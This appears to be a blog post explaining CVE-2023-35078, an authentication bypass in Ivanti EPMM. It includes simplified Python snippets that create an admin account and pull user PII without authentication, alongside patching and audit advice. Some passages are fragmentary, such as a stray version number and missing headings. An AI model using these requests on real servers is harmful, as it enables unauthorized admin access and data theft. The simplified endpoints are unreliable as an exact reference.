In July 2023, a critical vulnerability was discovered in Ivanti Endpoint Manager Mobile (EPMM), which was known as MobileIron Core. This security hole, tracked as CVE-2023-35078, allows attackers to bypass authentication and gain admin access. It was exploited in the wild before a patch was released, putting thousands of organizations at risk. In this post, you’ll learn what the bug is, how the attack works, what the code looks like, and how you can protect your systems.
What is CVE-2023-35078?
CVE-2023-35078 is an authentication bypass vulnerability in Ivanti EPMM (MobileIron Core) versions up to 11.10. This bug lets a remote attacker skip login altogether—giving them unauthorized access to sensitive information, the ability to add admin users, and even change device management policies.
If you run Ivanti EPMM (MobileIron Core) and have not patched recently, you may be exposed.
Official Advisory
- Ivanti Security Advisory: CVE-2023-35078
- National Vulnerability Database: CVE-2023-35078
How Bad Is This Vulnerability?
The flaw scored a CVSS 9.8/10 (Critical) and affects most deployments. What makes it especially dangerous:
Vulnerable API Endpoints
Ivanti EPMM exposes several API endpoints that were meant for internal use only. Due to a misconfiguration, these endpoints did not require proper authentication. Anyone with network access (including the internet, if not properly firewalled) could reach them.
Example Exploit: Creating an Admin User
Let’s look at a (redacted and simplified) Python code snippet showing how an attacker could add an admin account using the flaw.
import requests
TARGET = "https://vulnerable-epmm.example.com";
NEW_ADMIN = {
"username": "pwnedadmin",
"password": "SuperSecurePassword123!",
"role": "admin"
}
url = f"{TARGET}/api/v2/admins"
r = requests.post(url, json=NEW_ADMIN, verify=False) # No authentication headers!
if r.status_code == 201:
print("[+] Successfully created a new admin account!")
else:
print("[-] Failed, status:", r.status_code, r.text)
The above code sends a POST request directly to an admin creation endpoint — without any login or authentication cookies!
Fetching PII with a Simple GET Request
PII (user emails, phone numbers, more) could also be leaked via unauthenticated GET requests.
url = f"{TARGET}/api/v2/users"
r = requests.get(url, verify=False) # No credentials needed!
print(r.json())
Your EPMM instance is accessible from the internet (even VPN users can exploit it internally).
You can test exposure by sending a request to /api/v2/diagnostics (or similar endpoint). If you receive diagnostic information without logging in, you are exposed.
11.8.1.1
Apply the latest Ivanti patch as soon as possible.
2. Audit for Compromise
Because this was exploited in the wild, check your admin accounts, review EPMM config history, and look for new or suspicious accounts that you did not create.
3. Restrict EPMM Access
Only allow connections to your EPMM system from management networks.
4. Monitor Ivanti Security Advisories
Stay up to date with Ivanti’s support forums and CISA guidance.
Real-World Attacks
In July 2023, threat actors were spotted exploiting CVE-2023-35078 in Norway, targeting government and private organizations. Attackers leveraged it to gain unauthorized access and steal data.
Source: Norwegian National Security Authority warning
Summary
CVE-2023-35078 is a simple but devastating bug—letting attackers take over Ivanti EPMM with no login. If you use EPMM, patch now, check for compromise, and tighten your access controls.
Don’t wait: This vulnerability is widely attacked, and exploits are easy to run. Stay safe!
Further Reading
- Ivanti Security Bulletin
- Rapid7 Analysis
- NIST NVD Entry
Need technical help? Ivanti customers can reach out via Ivanti Support Portal. Secure your systems!
Timeline
Published on: 07/25/2023 07:15:10 UTC
Last modified on: 08/04/2023 18:30:34 UTC